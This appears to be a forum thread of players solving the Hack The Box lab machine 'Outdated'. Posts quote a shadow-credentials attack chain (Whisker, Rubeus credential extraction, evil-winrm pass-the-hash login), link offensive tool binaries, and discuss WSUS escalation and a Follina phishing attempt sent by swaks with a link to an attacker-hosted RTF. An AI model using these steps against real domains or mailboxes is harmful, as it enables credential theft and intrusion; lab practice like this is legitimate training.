Outdated - HTB
(August 15, 2022, 09:48 AM)delmerherberth Wrote: I believe the intended path from sflowers to administrator is via wsus. Was anyone able to get root that way or am I down a rabbit hole?


Correct way.
Reply
the way i got user is via shadow credentials
* https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
* download the pre-compiled binaries here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

> Whisker.exe add /target:sflowers
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"generated-pass" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
> evil-winrm -i 10.129.166.87 -u sflowers -H <ntlm-hash>

stuck on root part, i believe this has to do with wsus, but none of the ways on https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus work yet. anyone able to compile https://github.com/GoSecure/wsuspicious?
Reply
follina is not working, not getting any response back
Reply
(August 13, 2022, 09:02 PM)yumi Wrote:


it's follina
Reply
tyyyyyy
Reply
(August 15, 2022, 10:44 AM)meowmeowattack Wrote: the way i got user is via shadow credentials
* https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
* download the pre-compiled binaries here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

> Whisker.exe add /target:sflowers
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"generated-pass" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
> evil-winrm -i 10.129.166.87 -u sflowers -H <ntlm-hash>


stuck on root part, i believe this has to do with wsus, but none of the ways on https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus work yet. anyone able to compile https://github.com/GoSecure/wsuspicious?


I was able to compile it but it still doesn't work for me
Reply
(August 15, 2022, 11:36 AM)delmerherberth Wrote:
(August 15, 2022, 10:44 AM)meowmeowattack Wrote: the way i got user is via shadow credentials
* https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
* download the pre-compiled binaries here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

> Whisker.exe add /target:sflowers
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"generated-pass" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
> evil-winrm -i 10.129.166.87 -u sflowers -H <ntlm-hash>


stuck on root part, i believe this has to do with wsus, but none of the ways on https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus work yet. anyone able to compile https://github.com/GoSecure/wsuspicious?


I was able to compile it but it still doesn't work for me


share steps of SMTP follina
if you know cuz it's not working here
Reply
(August 13, 2022, 09:02 PM)yumi Wrote: .
Reply
(August 13, 2022, 09:02 PM)yumi Wrote:


ty
Reply
I tried
swaks --to [email protected] --from [email protected] --server mail.outdated.htb --body "http://10.XX.XX.XX/test.rtf" 
The machine will get the .rtf file but the rtf payload will not work. I have tried the rtf payload on any.run, and it works on any.run.

change rtf to doc or docx, the machine will not call back :angel:
Reply

